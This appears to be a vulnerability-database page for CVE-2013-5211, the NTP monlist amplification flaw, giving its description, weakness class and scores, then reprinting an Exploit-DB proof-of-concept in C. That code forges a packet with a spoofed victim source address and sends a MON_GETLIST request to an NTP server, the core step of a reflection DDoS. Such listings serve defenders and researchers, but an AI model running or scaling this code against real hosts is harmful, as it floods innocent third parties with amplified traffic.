CVE-2013-5211 Detail

CVE-2013-5211

OWSAP

A03-Injection

EPSS

92.57%V3

Vector

Network

Published

2014-01-02
10h00 +00:00

Modified

2017-12-08
09h57 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-20	Improper Input Validation The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	5		AV:N/AC:L/Au:N/C:N/I:N/A:P	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 33073

Publication date : 2014-04-27 22h00 +00:00
Author : Danilo PC
EDB Verified : No

/* * Exploit Title: CVE-2013-5211 PoC - NTP DDoS amplification * Date: 28/04/2014 * Code Author: Danilo PC - <[email protected]> * CVE : CVE-2013-5211 */ /* I coded this program to help other to understand how an DDoS attack amplified by NTP servers works (CVE-2013-5211) * I took of the code that generates a DDoS, so this code only sends 1 packet. Why? Well...there's a lot of kiddies out there, * if you know how to program, making a loop or using with other tool is piece of cake. There core idea is there, just use it as you please. */ //------------------------------------------------------------------------------------------------// //------------------------------------------------------------------------------------------------// #include <stdio.h> //For on printf function #include <string.h> //For memset #include <sys/socket.h> //Structs and Functions used for sockets operations. #include <stdlib.h> //For exit function #include <netinet/ip.h> //Structs for IP header //Struct for UDP Packet struct udpheader{ unsigned short int udp_sourcePortNumber; unsigned short int udp_destinationPortNumber; unsigned short int udp_length; unsigned short int udp_checksum; }; // Struct for NTP Request packet. Same as req_pkt from ntpdc.h, just a little simpler struct ntpreqheader { unsigned char rm_vn_mode; /* response, more, version, mode */ unsigned char auth_seq; /* key, sequence number */ unsigned char implementation; /* implementation number */ unsigned char request; /* request number */ unsigned short err_nitems; /* error code/number of data items */ unsigned short mbz_itemsize; /* item size */ char data[40]; /* data area [32 prev](176 byte max) */ unsigned long tstamp; /* time stamp, for authentication */ unsigned int keyid; /* encryption key */ char mac[8]; /* (optional) 8 byte auth code */ }; // Calculates the checksum of the ip header. unsigned short csum(unsigned short *ptr,int nbytes) { register long sum; unsigned short oddbyte; register short answer; sum=0; while(nbytes>1) { sum+=*ptr++; nbytes-=2; } if(nbytes==1) { oddbyte=0; *((u_char*)&oddbyte)=*(u_char*)ptr; sum+=oddbyte; } sum = (sum>>16)+(sum & 0xffff); sum = sum + (sum>>16); answer=(short)~sum; return(answer); } //Da MAIN int main(int argc, char **argv) { int status; // Maintains the return values of the functions struct iphdr *ip; // Pointer to ip header struct struct udpheader *udp; // Pointer to udp header struct struct ntpreqheader *ntp; // Pointer to ntp request header struct int sockfd; // Maintains the socket file descriptor int one = 1; // Sets the option IP_HDRINCL of the sockt to tell the kernel that the header are alredy included on the packets. struct sockaddr_in dest; // Maintains the data of the destination address char packet[ sizeof(struct iphdr) + sizeof(struct udpheader) + sizeof(struct ntpreqheader) ]; //Packet itself // Parameters check if( argc != 3){ printf("Usage: ./ntpDdos [Target IP] [NTP Server IP]\n"); printf("Example: ./ntpDdos 1.2.3.4 127.0.0.1 \n"); printf("Watch it on wireshark!\n"); printf("Coded for education purpose only!\n"); exit(1); } // Create a socket and tells the kernel that we want to use udp as layer 4 protocol sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP); if (sockfd == -1){ printf("Error on initializing the socket\n"); exit(1); } //Sets the option IP_HDRINCL status = setsockopt( sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one); if (status == -1){ printf("Error on setting the option HDRINCL on socket\n"); exit(1); } //"Zeroes" all the packet stack memset( packet, 0, sizeof(packet) ); //Mounts the packet headers // [ [IP HEADER] [UDP HEADER] [NTP HEADER] ] --> Victory!!! ip = (struct iphdr *)packet; udp = (struct udpheader *) (packet + sizeof(struct iphdr) ); ntp = (struct ntpreqheader *) (packet + sizeof(struct iphdr) + sizeof(struct udpheader) ); //Fill the IP Header ip->version = 4; //IPv4 ip->ihl = 5; //Size of the Ip header, minimum 5 ip->tos = 0; //Type of service, the default value is 0 ip->tot_len = sizeof(packet); //Size of the datagram ip->id = htons(1234); //LengthIdentification Number ip->frag_off = 0; //Flags, zero represents reserved ip->ttl = 255; //Time to Live. Maximum of 255 ip->protocol = IPPROTO_UDP; //Sets the UDP as the next layer protocol ip->check = 0; //Checksum. ip->saddr = inet_addr( argv[1] ); //Source ip ( spoofing goes here) ip->daddr = inet_addr( argv[2] ); //Destination IP //Fills the UDP Header udp->udp_sourcePortNumber = htons( atoi( "123" ) ); //Source Port udp->udp_destinationPortNumber = htons(atoi("123")) ; //Destination Port udp->udp_length = htons( sizeof(struct udpheader) + sizeof(struct ntpreqheader) ); //Length of the packet udp->udp_checksum = 0; //Checksum //Calculate the checksums ip->check = csum((unsigned short *)packet, ip->tot_len); //Calculate the checksum for iP header //Sets the destination data dest.sin_family = AF_INET; // Address Family Ipv4 dest.sin_port = htons (atoi( "123" ) ) ; // Destination port dest.sin_addr.s_addr = inet_addr( argv[2] ); // Destination Endereço para onde se quer enviar o pacote //Fills the NTP header //Ok, here is the magic, we need to send a request ntp packet with the modes and codes sets for only MON_GETLIST //To do this we can import the ntp_types.h and use its structures and macros. To simplify i've created a simple version of the // ntp request packet and hardcoded the values for the fields to make a "MON_GETLIST" request packet. // To learn more, read this: http://searchcode.com/codesearch/view/451164#127 ntp->rm_vn_mode=0x17; //Sets the response bit to 0, More bit to 0, Version field to 2, Mode field to 7 ntp->implementation=0x03; //Sets the implementation to 3 ntp->request=0x2a; //Sets the request field to 42 ( MON_GETLIST ) //All the other fields of the struct are zeroed // Sends the packets status = sendto(sockfd, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(dest) ); if(status <0){ printf("Failed to send the packets\n"); exit(1); } }